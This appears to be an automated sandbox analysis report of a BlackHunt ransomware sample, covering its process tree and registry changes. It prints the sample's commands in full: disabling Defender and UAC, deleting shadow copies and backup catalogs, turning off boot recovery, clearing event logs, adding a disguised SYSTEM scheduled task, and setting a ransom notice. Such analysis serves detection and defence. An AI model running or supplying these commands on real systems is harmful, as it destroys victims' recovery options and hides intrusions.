921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 212 PID 4360 wrote to memory of 4132 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 212 PID 4200 wrote to memory of 3932 4200 cmd.exe 122 PID 4200 wrote to memory of 3932 4200 cmd.exe 122 PID 4360 wrote to memory of 4672 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 121 PID 4360 wrote to memory of 4672 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 121 PID 620 wrote to memory of 856 620 cmd.exe 120 PID 620 wrote to memory of 856 620 cmd.exe 120 PID 4360 wrote to memory of 436 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 209 PID 4360 wrote to memory of 436 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 209 PID 4360 wrote to memory of 432 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 124 PID 4360 wrote to memory of 432 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 124 PID 4360 wrote to memory of 4528 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 123 PID 4360 wrote to memory of 4528 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 123 PID 4360 wrote to memory of 5080 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 129 PID 4360 wrote to memory of 5080 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 129 PID 4328 wrote to memory of 3244 4328 cmd.exe 128 PID 4328 wrote to memory of 3244 4328 cmd.exe 128 PID 2520 wrote to memory of 2956 2520 reg.exe 127 PID 2520 wrote to memory of 2956 2520 reg.exe 127 PID 4132 wrote to memory of 1164 4132 cmd.exe 186 PID 4132 wrote to memory of 1164 4132 cmd.exe 186 PID 4360 wrote to memory of 1048 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 131 PID 4360 wrote to memory of 1048 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 131 PID 4360 wrote to memory of 4992 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 137 PID 4360 wrote to memory of 4992 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 137 PID 4360 wrote to memory of 4916 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 134 PID 4360 wrote to memory of 4916 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 134 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe"C:\Users\Admin\AppData\Local\Temp\921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4360 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:4580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:3380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:5008
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:2148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:4200
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:3132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:432
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:3380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:5080
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1048
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4992
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:896
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:2520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:6856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4340
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1244
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3168
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:9644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe" /F3⤵
- Creates scheduled task(s)
PID:9560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2716
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:10776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:10252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3616
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:9552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2852
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1028
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:10228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:528
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3432
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1832
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5112
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1164
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:10792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2292
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:436
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4328
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:7628
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:8512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:7376
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:14384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8272
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:8592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:8556
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:10220
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:12140
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:18452
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:14520
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:14524
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:14712
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:14840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:15392
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:14880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:14796
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:9648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2368
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:15212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:14984
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:15132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:15004
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:6724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:8812
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:6484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:15112
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:15660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:8700
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:9856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:15400
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:15608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:18868
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
PID:15616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:13280
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:15824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15824 -s 14644⤵
- Program crash
PID:15196
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe"2⤵PID:15420
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:9644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:8716
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3168
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:5044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:3244
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:1164
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:6476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:6648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵
